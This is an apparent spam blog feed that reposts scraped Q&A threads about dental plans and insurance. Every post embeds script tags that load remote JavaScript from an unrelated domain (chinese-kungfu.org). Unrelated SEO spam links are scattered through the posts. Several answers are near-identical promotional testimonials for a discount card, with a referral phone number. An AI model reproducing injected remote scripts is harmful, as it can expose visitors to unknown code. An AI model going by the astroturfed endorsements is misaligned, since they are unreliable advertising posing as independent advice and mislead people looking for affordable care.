tag:blogger.com,1999:blog-12055828546699604022024-03-08T02:07:56.595-08:00dental plansSEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.comBlogger289125tag:blogger.com,1999:blog-1205582854669960402.post-57518444888425000062010-05-21T18:50:00.001-07:002010-05-21T18:50:22.344-07:00Does anyone know of a cheap dental plan?I don't have much money and I'm in pain with a killer toothache. I 'm in college and work part time so money is an issue right now.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Does anyone know of a cheap dental plan?<br>I would encourage you to visit this website.<br><br /><br />www.healthsavings.ourperfectcard.com<br><br /><br />I signed up with them online over 3 years ago, when i was in college for all my dentistry work without age limits. And I still have them. They have helped me save thousands of dollars from extractions, root canals, cleanings. I know for a fact that all services are included especially orthodontics and dentures in the benefits. They had my membership active in 2 hours and was able to use the same day. I am very thankful that I found them. Check to see if they are in your area.<br><br /><br />Good Luck. Hope this helps<br>Reply:nhs dentists....<br>Reply:it is getting harder to find a good dental plan. they cost more and cover less then you have to find a dentist that will accept it. in my area discount programs are popular but the only dentists that accept it are the huge practices that only have new dentists or foreigners. ask around and see who your friends go to. most dentists today will make up a payment plan either on their own or thru a financial institution.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-60066635223098154782010-05-21T18:50:00.000-07:002010-05-21T18:50:04.432-07:00Does anyone have any info about the GE Wellness dental plan?Is it what is out rightly stated or are there those "hidden" surprises<br><br /><br />once you put the plan to work?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Does anyone have any info about the GE Wellness dental plan?<br>The GE Wellnes Dental Plan is an excellant discount dental plan! You are provided with a complete schedule of benefits with discounted fees on many common dental procedures.<br><br /><br /><br><br /><br />Save an average of 30% on your family’s dental care, including oral exams and bitewing x-rays at no additional charge, plus significantly discounted rates on more than 170 procedures, including oral surgery.<br><br /><br /><br><br /><br />Visit one of the participating network professionals in your area for great discounts - simply identify yourself as a member when you make your appointment and your fees will be automatically discounted at the time of service. <br><br /><br /><br><br /><br />Visit the link provided below for more information<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://www.myspace-codes.com.cn/private-myspace/>private myspace</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-54369625553094866142010-05-21T18:49:00.003-07:002010-05-21T18:49:48.983-07:00How do get a list of dental places that accept my dental plan?Contact whoever provides your dental plan. Either the company itself, or if it's through an employer they might be able to give you the info. Like for a list of doctors that accept a health plan, you would call the health insurance company or see if they have a website.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>How do get a list of dental places that accept my dental plan?<br>Call your dental plan administrator they know who is in and who is not. They probably have it on their website.<br>Reply:your dental plan should have a website with this info<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-31229323741865172102010-05-21T18:49:00.002-07:002010-05-21T18:49:34.555-07:00What is the premium my dental plan will cover?How do I find out the difference I'd have to pay my dentist with my insurance. What are things to consider when using my insurance, will the doctor charge the insurance more than if I paid in cash? <br><br /><br /><br><br /><br />So far I paid in cash for two root canals and paid $450 per each one but the insurance game me a number of $560. Did the doctor charge me less because I paid in cash? This doctor is in-network.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>What is the premium my dental plan will cover?<br>Your dentist should give you a treatment plan after they have submitted and received the pre-determination from your insurance co. This will tell you what the dentist charges, what your insurance will pay and what part of the balance is your responsibility.<br><br /><br />Whether they give a break for people who pay cash is up to each individual office and how they like to run their business. We treat clergy for free, if that is unethical, than so be it. We also give breaks to large families, friends and colleagues. Sometimes we won't charge depending on the procedure that was done.<br><br /><br />Root canals in our area can range from approx. $650-$800 for an anterior tooth, $800-$1000 for a bicuspid (two roots), and $1000-$1250 for a molar root canal. Most insurance plans will pay approx 80% of a root canal, but it also depends on what your insurance co. considers "reasonable and customary" which means, Dr. A could charge $800 for a root canal but the insurance co. only allows $500.00 for that tooth, so they will pay 80% of the $500.00.(not the $800 charged)<br><br /><br />Also, a root canal is one of those procedures that does NOT require a predetermination, mostly because patients can't wait one month before having a root canal because they are in pain. <br><br /><br />Ask for a treatment plan of all the work you need to have done, and including insurance estimates. This will give you a better idea of what is really charged and what you owe, and what your insurance co. will pay.<br>Reply:Most doctors no matter what their specialty, will charge cash paying patients less. They do this because they want you to keep returning to them, and to give you a break on expenses. They usually discount by how much they would normally get from insurance anyway. So your example of the $560 charge, docotors are paid a fee schedule, or a certain amount by an insurance company. Barely ever will an insurance pay the whole charge. They usually payout at 80% and the fees go down from there after each additional charge to about 35%. <br><br /><br />This is why the doc probably charged you that amount, but trust me it's worth to go through your insurance, as they will end up picking up the most of the tab 90% of the time.<br>Reply:The best way to find out what your financial obligation will be for dental treatment is to have a pre-treatment estimate(pre-authorization) completed. Your dentist will file his fees for the procedures and the insurance company will report back what they will cover (your benefit) and what you will owe(your co-insurance) I hope that your dentist doesn't use different fee schedules based on insurance coverage, as that is both unethical and in violation of the dental practice acts in most states.<br>Reply:You should be able to get a good idea from the business office before you do a procedure. They have your info and can figure out what to expect and what you should expect to cover. Sometimes if you don't have a lot of coverage they can lower some of the charges for like administrative fees.<br>Reply:Contact the benefits department within your work place or your dental insurance company. There are tons of dental insurance as well as health ins. but I am sure you were aware of this otherwise you would not have ask this on here?<br>Reply:Your insurance will have a fee for each procedure that your dentist would do on you. This is called a usual and customary fee. The dentist can't charge you anymore than this fee, since he is in-network. They insurance will then pay their percentages off of this fee, such as 100% preventative, 80% basic (including root canals), and 50 % major.<br><br /><br /><br><br /><br />Your copay on each rootcanal seems to be too high. $450 is not 20% of a rootcanal. What is the percentage on your plan for a rootcanal? You also need to find out your insurance companies Usual and customary fee. If you do this, you can find out exactly how much you would be paying each procedure.<br><br /><br /><br><br /><br />The insurance company shouldn't get charged differently than what you get charged. That is insurance fraud. What is on the claim, is the amount they charged you. They can't put one amount on the claim and quote you another fee. This has nothing to do with your copay. You would owe a copay regardless. What I am saying, is they can't submit a claim saying they charged you $600 for a rootcanal, if they in fact only charged you $400. Just an example, but you see what I mean.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://2hiking-boots.blogspot.com/>hiking boots</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-86264892794293068762010-05-21T18:49:00.001-07:002010-05-21T18:49:17.501-07:00If Homer gives up his dental plan - will he have to pay for Lisas braces? :)?Yes he will<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>If Homer gives up his dental plan - will he have to pay for Lisas braces? :)?<br>Homer is so lucky! Thanks for choosing my answer as best answer ;o) <span>Report It</span><br /> <br>Reply:I saw that episode!!!<br>Reply:yup/<br>Reply:no<br>Reply:Rory Emerald will pay for them.<br>Reply:I havent been watching lately but i suppose he will<br><br /><br />love the show<br>Reply:yes<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-45210466684227575972010-05-21T18:49:00.000-07:002010-05-21T18:49:01.003-07:00If Homer gives up his Dental Plan. . . . will he have to pay for Lisa's braces?yes, the union needs their dental plan and lisa needs straight teeth<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>If Homer gives up his Dental Plan. . . . will he have to pay for Lisa's braces?<br>yes<br>Reply:Yes, jaja.<br><br /><br /><br><br /><br />-Dental plaaaan!<br><br /><br />-Lisa needs brackets<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-23343237338337425502010-05-21T18:48:00.002-07:002010-05-21T18:48:45.867-07:00Need to find the best dental plan?Needs to be great need to find good quality insurance<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Need to find the best dental plan?<br>go to google.com and find out!!!!!!!!!!!<br>Reply:There is no such thing as the best dental plan.<br><br /><br />There is no such thing as good quality insurance.<br><br /><br /><br><br /><br />It all depends on what you want really. So tell us more.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-47786332269761134192010-05-21T18:48:00.001-07:002010-05-21T18:48:30.451-07:00If there was an affodable Dental plan for under twenty bucks?Would the world be a happier place?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>If there was an affodable Dental plan for under twenty bucks?<br>%26gt;sigh%26lt; I doubt it. Even when people are given free dental plans at work, only half of them every use them.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://www.imwebhost.com/web-hosting-plans/>web hosting plans</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-20021475477016187802010-05-21T18:48:00.000-07:002010-05-21T18:48:13.004-07:00I'm looking for my dental plan named First Commonwealth?http://firstcommonwealth.net/<br><br /><br /><br><br /><br />First Commonwealth is a subsidiary of Guardian and all queries should be directed there. The above website tells you all about it.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-47821349669153346692010-05-21T18:47:00.003-07:002010-05-21T18:47:57.567-07:00I don't have a dental plan, Where do I find a cheap dentist?None of the Dentists that I have met are cheap. What I did is called and talked to the receptionist and just asked. Believe me where I live anyway I found that prices do vary. For example one Dentist for teeth cleaning $65 another was $175 and both didn't include x-rays.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>I don't have a dental plan, Where do I find a cheap dentist?<br>Well i dont know where you live but im from az and we have discount plans availble here. Try looking online in your state im sure you have some too. And the fees are really reduced. Like for some plans for an exam and full set of xrays is $181 cash price and with these discount plans $0. Good Luck<br>Reply:they cover you for cosmetics,filling,and all dental procedures call them and see if you like theplan they will give you a free cellphone too.1-800-929-8344 ref 246314<br>Reply:You may want to consider contacting the American Dental Association and ask them to direct you to your local dental society. They should be able to provide you with a list of dentists that provide free or sliding scale services in your area. You could also get a dental discount plan, like Careington or People's Dental. You would receive discounted services.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-48708840080755291852010-05-21T18:47:00.002-07:002010-05-21T18:47:44.949-07:00Is there any kind of dental plan (discount or otherwise) that will pay for cosmetic dentistry?Careington International is a discount plan that offers one of the better price plans around. For an individual it's $75/yr. The discounts range for cosmetics. I know for Orthodontics it's a 20% discount. For general dentistry they have a flat fee chart available as well.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Is there any kind of dental plan (discount or otherwise) that will pay for cosmetic dentistry?<br>No, that's a choice, not a necessity!<br>Reply:I'm not sure if you are based in the UK but try Bupa or Denplan<br>Reply:you can make payments on it. try getting a care card<br>Reply:http://www.myglobalprofile.com/center-fo... They can give you more info on this. Some do pay and some dont depending on what the problem is!<br>Reply:Yes. Check out this website.<br><br /><br />www.healthsavings.ourperfectcard.com<br><br /><br />I signed up online a couple years ago, they have saved me thousands of dollars on my dentistry work, without sacrificings service and quality. I know for a fact that all procedures are covered including cosmetic surgery. I have had things done (root canals, extractions, fillings and cleanings etc.) I know they are nation wide.<br><br /><br />Hope this helps<br>Reply:If you got really good insurance, you'll be lucky if they pay half. But, be prepared to still pay big bucks for cosmetic dental work.<br>Reply:Yes! There is a dental benefits company you can join for about twenty dollars a month and they include cosmetic dentistry. You do have to have one of their providers in your area though, so go check out the website and if it look like it could help you. There is a provider search area to see if you have a dentist in your area listed.<br>Reply:No offense to the other answers, but Ameriplan is really terrible, it's expensive, there is a sign up fee, and they will try to get you to sell their plan because it's just a huge pyramid, not to mention they have barely any dentists who accept it because the fees wouldn't be accepted by a dentists who isn't desperate and I don't think you want them performing your cosmetic dentistry...<br><br /><br /><br><br /><br />Here is your best bet to make your cosmetic dentistry the most affordable AND VISIT A DENTIST WHO ISN'T A JOKE.<br><br /><br /><br><br /><br />I'm not sure if you've heard of DenteMax, but basically they recruite quality licensed credentialed dentists all across the country. The credentialing process can be lengthy and all the dentists are checked to make sure they are quality. Well a new company called DentaCard just partnered with them and they provide an incredible plan with great support. A one time payment of $49.95 will get you a year in the program and it'll save you up to 50% at quality dentists. Then what you'll want to do is finance the remainder of the costs.<br><br /><br /><br><br /><br />To summerize. Use DentaCard to get a discounted rate at a quality dentist, then look for financing options for the remainder of what you owe.<br><br /><br /><br><br /><br />Search for dentists in your area here:<br><br /><br />http://dentacard.com/services/services.h...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-42793744156223148752010-05-21T18:47:00.001-07:002010-05-21T18:47:27.140-07:00What is the best individual dental plan?I looked on a site called DentalPlans.com, but was a little confused on which was the best deal... i just need a cleaning and a couple fills... thanks for your help<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>What is the best individual dental plan?<br>Individual dental plans are usually not helpful for you unless you need a lot of work done. Even then, most plans only cover up to $1000 or even $1500 of treatment.<br><br /><br /><br><br /><br />At the office where I work, we charge $110 for a cleaning and exam. If you have a checkup every 6 months, thats $220. Factor in a couple of fillings and a crown and you're looking at another $1200. So, that's about $1500 out-of-pocket for the year. <br><br /><br /><br><br /><br />With insurance, cleanings are usually covered at 100%, fillings at 80% and crowns at 50% up to your yearly maximum. So, given the above example of treatment, you'd still pay about $600 out of pocket plus your monthly premiums.<br><br /><br /><br><br /><br />Just make sure you factor all the numbers to make sure the plan is definately going to be worth the expense. You're better off getting a plan through an employer if that is possible at all.<br>Reply:I needed a 4 cavities filled in Oct of 2005 (4 @ $185 each)<br><br /><br />waited till I started my new job and got the dental insurance<br><br /><br /><br><br /><br />In May 2006 - started using ToothSoap - finally got in to see the<br><br /><br />dentist Jan 2007 - NO cavities! the stuff works<br><br /><br /><br><br /><br />it re-enameled my teeth! - tell them Tom sent you! <br><br /><br />maybe I will get a star!<br><br /><br /><br><br /><br />the first one is more $ because you buy a book - <br><br /><br />but they have specials to save you money<br><br /><br /><br><br /><br />my first jar of 'shreds' was supposed to last 2 people 3 months<br><br /><br />I have been using it since May of last year - and have 1/3 left<br><br /><br />using it by myself<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://computer.imwebhost.com/php/>php</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-16364340768683133952010-05-21T18:47:00.000-07:002010-05-21T18:47:11.349-07:00What is the best affordable dental plan?Check out this website.<br><br /><br /><br><br /><br />www.healthsavings.ourperfectcard.com<br><br /><br /><br><br /><br />Its low cost, affordable, 1000's of providers nation wide, accepted almost any where. Vision, chiropractic, prescription, medical and Dental services all included.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-13269504000509419402010-05-21T18:46:00.003-07:002010-05-21T18:46:54.815-07:00What is good individual, insurance dental plan?I only know of one good individual dental plan, you can get it at www.BestForLessDental.com, and I love it because it has no waiting periods. The other plans I looked at would have me waiting 6 months to get my tooth pulled. This one covered me right away, and I could see any dentist I wanted, no list of providers. What I liked was the deductible, it was only 100 bucks and once I met it, I was set for as long as I have the plan. Most plans make you meet the deductible every year, but not this one. It is very affordable, and I have already saved hundreds! Good luck to you.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>What is good individual, insurance dental plan?<br>Check out Aetna Dental Access. It is not an insurance plan but it allows you access to their network at preferred rates for dental work. It is inexpensive for the saving you coould have on dental work. Most of the time you are going to find the best dental insurance plans through an employer.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-3142451899981572010-05-21T18:46:00.002-07:002010-05-21T18:46:38.522-07:00If homer gives up his dental plan, will he have to pay for lisa's braces?Lisa needs braces DENTAL PLAN Lisa needs braces DENTAL PLAN Liza needs braces DENTAL PLAN...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>If homer gives up his dental plan, will he have to pay for lisa's braces?<br>i dont think that homer has dental....doh<br>Reply:Clearly he will.<br>Reply:So we'll march day and night by the big tower they have the plant but we have the tower(not sure if those were the exact words I'd have to get the episode back out and watch it.) All that free beer, what was it a keg right, how could they pass on that deal to give up the dental plan lol.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-41637624194942801372010-05-21T18:46:00.001-07:002010-05-21T18:46:22.750-07:00What is a good individual dental plan?depends where you live, each state has their own individual plan providers. Mine is through EDS, but I'm in Arizona.<br><br /><br /><br><br /><br />Maybe you could email them and ask if they know of a similar plan in your area. http://www.mydentalplan.net/contentL2.as...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>What is a good individual dental plan?<br>No purpose, we had one they pay nothing!!!! Compared to actual bill. Ex. You Pay $30 for Dental Ins. The dental check up charges $157 they pay $12 Paula<br>Reply:I have Delta Dental. Each plan offered by an employer may be different. Talk to your human resource/benefits coordinator. I have heard advertisements for entrepenuers to purchase.<br><br /><br /><br><br /><br />Here are a few places to research on the web:<br><br /><br />www.dentalinsurance.com<br><br /><br />www.deltadentalins.com<br><br /><br />www.humanadental.com<br><br /><br />www.metlife.com/dental<br><br /><br /><br><br /><br />Good luck!<br>Reply:DENTAL INSURANCE IS A RIP OFF!!!!<br><br /><br /><br><br /><br />i have to tell my patients this everyday. the best thing that you can possibly do is to plan for your dentistry. start by putting $50 a month in a bank account (that's less than an insurance premium). in a year's time you'll have $600. do this for a couple years and you're set for your dental emergency fund. second, you need to start flossing. that's the cheapest way to stay out of my chair. finally, you have to start going to the dentist twice a year. it only gets expensive when you have a cavity that could have been fixed a while back but you let it go too long and now it needs a root canal and crown.<br><br /><br /><br><br /><br />i can hear you now though, "but i need a lot of dental work now!" well that's too bad and your new insurance company is going to tell you the same thing. they make you wait up to a year on pre-existing conditions and then they only give you enough coverage to fix one tooth a year assuming it needs more than a simple filling.<br><br /><br /><br><br /><br />DON'T WASTE YOUR MONEY ON DENTAL INSURANCE!!!<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://www.ni0506.cn/>art</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-33676010733416224482010-05-21T18:46:00.000-07:002010-05-21T18:46:05.875-07:00Does route canal work get covered by restorative dental work on a dental plan?It should, if not then it not worth having that company. <br><br /><br /><br><br /><br />I would encourage you to visit this website.<br><br /><br />www.healthsavings.ourperfectcard.com<br><br /><br />I signed up with them online over 3 years ago. They have helped me save thousands of dollars from extractions, root canals, cleanings. I know for a fact that all services are included especially orthodontics and dentures in the benefits. They had my membership active in 2 hours and was able to use the same day. I am very thankful that I found them. Check to see if they are in your area.<br><br /><br />Good Luck. Hope this helps<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Does route canal work get covered by restorative dental work on a dental plan?<br>Check your dental plan to see when root canal work is covered. Each plan is different. Or, have your dentist check with the insurance company before doing the work.<br>Reply:It depends on your dental plan. You need to find out specifically what level of pay "Endodontic" procedures are paid on. Sometimes it's considered restorative, sometime's it's considered major. The worst thing that you can do is have your dental office pre-determine the procedure as it unnecessarily delays treatment.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-72112009695879240192010-05-21T18:45:00.003-07:002010-05-21T18:45:49.694-07:00Where do I find dental claim forms for National Pacific Dental plan?Contact the Dental provider for a dental claim form or the insurance company directly. They should help. Good luck!<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Where do I find dental claim forms for National Pacific Dental plan?<br>Well, how about here?<br><br /><br /><br><br /><br />http://www.natlpacificdental.com/dental_...<br><br /><br /><br><br /><br />On their website?<br>Reply:go to yahoo. they have everything<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-76024067643051355372010-05-21T18:45:00.002-07:002010-05-21T18:45:35.020-07:00Looking for an affordable dental plan that cover most stuff? individual!?Try AmeriPlan. It's a great plan! Save anywhere from 50% to 80% on most services and even 25% when you have to go to a specialist. I love it! Recently I went to one of their providers, I had x-rays, teeth cleaning and some polishing, my total bill came out to $197 but I only paid $59 so I save $138 bucks. The plan is only $11.95 a month for an individual or $19.95 a month for household. Try requesting more information at: http://wehavebenefits.com/<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Looking for an affordable dental plan that cover most stuff? individual!?<br>the only good dental plans are provided by your employer normally w/ medical benefits..there are no decent dental plans that can be purchased by an individual.. you would end up paying more than what the benefits would cover<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-80497310181391948822010-05-21T18:45:00.001-07:002010-05-21T18:45:18.690-07:00Anyone know a good dental plan for a senior?Other than having AARP rip me off if you come up with another good one that is cheaper, please let me know. VA doesn't do that and hasn't since they changed the law or bill or whatever, so that Viet Nam vets get screwed sixteen ways from Sunday as usual. Then they complain they have no money, but every VA hospital I have ever been to they are building monuments and other worthless crap instead of using their funds to help the very people they were created to help. Sorry about the rant.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Anyone know a good dental plan for a senior?<br>You should check with AARP. They may have some suggestions.<br>Reply:Watch what one you find I heard there some that don't pay.<br><br /><br />Good Luck<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://2hiking-shoes.blogspot.com/>hiking shoes</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-28449153699456526562010-05-21T18:45:00.000-07:002010-05-21T18:45:01.218-07:00What's the best dental plan for a self employed 21 year old female?I live in The Woodlands, Tx if that makes a difference.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>What's the best dental plan for a self employed 21 year old female?<br>I am also self-employed. When I first started my business 9 years ago I looked into the insurance options. They cost a small fortune. I would recommend doing self-pay, because by the time you pay all of the deductibles it can cost as much as it would have if you paid on your own. ALL of my doctors offices, dentist, and health-care professionals cut me a deal when I tell them I am self-employed. The insurance companies cut rates with them, so why shouldn't they make a deal directly to you?<br>Reply:do ppl in tx even have teeth?<br>Reply:care credit- you can use it at most dental places- google "care credit"<br>Reply:Oh, you're a neighbor, I'm in Bellaire. <br><br /><br /><br><br /><br />The BEST individual dental plan is "pay out of pocket". When you run the numbers, they cover so little, and cost so much, it's cheaper to just pay out of pocket. I've done it for YEARS that way. Even with paying for a crown once every 5 years, it's cheaper (as they pay NOT MUCH towards a crown, and not at ALL until you've held the policy for a few years).<br>Reply:take a look at this one. You can go to any dentist you want and you get to use insured and discount benefits <br><br /><br /><br><br /><br />http://www.mybenefitplan.info<br>Reply:This is a company that has been around for 15 years. Dental, Vision, Rx and Chiropractic benefits for $19.95 a month!<br><br /><br /><br><br /><br />check it out http://www.helpyousavenow.com <br><br /><br /><br><br /><br />Hope this helps!<br><br /><br /><br><br /><br />Tammy<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-65693781795030602582010-05-21T18:44:00.002-07:002010-05-21T18:44:46.310-07:00I need helth and dental plan that I can use in Ada Ok. don't whant to travle a long distents.?why not try out this site you will get all the info you need at <br><br /><br />www.freedomathometeam.com/jdurrence or durrence@pisp.net.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>I need helth and dental plan that I can use in Ada Ok. don't whant to travle a long distents.?<br>lol i grew up in allen!<br>Reply:Dental insurance has limited value. If you are in need of major repair work, most insurance policies have a limited benefit in the early years of a policy. If it's just for cleaning, what you pay in premiums may be equal or more than what the cleaning's cost. <br><br /><br /><br><br /><br />Medical insurance is necessary. Be sure to read the policy paying close attention to deductible, copays and/or coinsurance, out of pocket maximum and maximum lifetime benefit. Read the 'exclusion' portion very carefully.<br><br /><br /><br><br /><br />Your state dept of Insurance will have a list of insurers that offer policies in your area. One reputable firm is Golden Rule (they're part of the large insurer United Health care). Look them up and you can contact them on the computer or via phone.<br><br /><br /><br><br /><br />Good luck.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-32032238089464923672010-05-21T18:44:00.001-07:002010-05-21T18:44:29.070-07:00If i get a dental plan with boots, if say i needed treatment tomorrow would it cover me?thanks x<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>If i get a dental plan with boots, if say i needed treatment tomorrow would it cover me?<br>When I was in college I needed alot of dental work but could not afford insurance and needed it ASAP. I did some research and found this plan.<br><br /><br />www.healthsavings.ourperfectcard.com<br><br /><br />I signed up with them online about 3 years ago now. They are very affordable, had my benefits active in 2 hours and saved me literally thousands of dollars. I know for a fact that all services are included ex: Including cleanings, exams, x-rays ..etc. Check to see if its availible in your area.<br><br /><br />Good Luck and Hope this Helps.<br>Reply:I doubt it - generally for these types of insurance plans you have to have an initial examination and any problems would have to be taken care of before they would cover you, and then from there on in they will cover any work you need done.<br>Reply:call 1-800-929-8344 Ref 246314 they will cover you with any pre-existing problem.it can be you or your family for 25 $ a month.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-68963611930158162192010-05-21T18:44:00.000-07:002010-05-21T18:44:13.497-07:00Find Chevron USA Retiree Dental Plan?Chevron-Texaco Retiree Benefits - find information<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Find Chevron USA Retiree Dental Plan?<br>Try http://www.texacoretireesclubct.org/page...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><a href=http://3golf-shoes.blogspot.com/>golf shoes</a>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0tag:blogger.com,1999:blog-1205582854669960402.post-24930247971618959272010-05-21T18:43:00.003-07:002010-05-21T18:43:59.374-07:00I have a new dental plan, can I use it to pay the balance of my son's braces?Well this just really depends on your insurance company. Some will pick up on what is left and some won't. Working in a Ortho office I know that sometimes they do pay. You would have to let the front desk know of the changes and have them call to see. I know from calling that most do pick up on the coverage.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>I have a new dental plan, can I use it to pay the balance of my son's braces?<br>I don't think you can use that on previous treatment plans...<br>Reply:Why are you posting this question here? Pick up your telephone and call customer service for your dental plan.<br>Reply:No way we can answer this because it depends completely on what kind of dental plan you have.<br>Reply:If the dental plan is more recent than the braces for your son, you cannot apply that towards your son's balance. It is a debt incurred prior to your dental coverage. Dental plans need starting treatment dates and finishing treatment dates. Also some policies have restrictions, like a 6 month waiting period for any major work.<br>Reply:Since your son's treatment is already in progress, I would think not. However, if it is a 'rollover' plan, they just might. <br><br /><br /><br><br /><br />Your orthodontist's office should have answered this for you, and/or brought it up when you told them about the insurance change.<br><br /><br /><br><br /><br />Definitely call the insurance company and find out.. and have a pen and paper ready so you can write down what you're told.. then you can relay the info to the office. They may not even have ortho benefits, as some do not.<br><br /><br /><br><br /><br />Best of Luck~<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br>SEANhttp://www.blogger.com/profile/06096002898901147156noreply@blogger.com0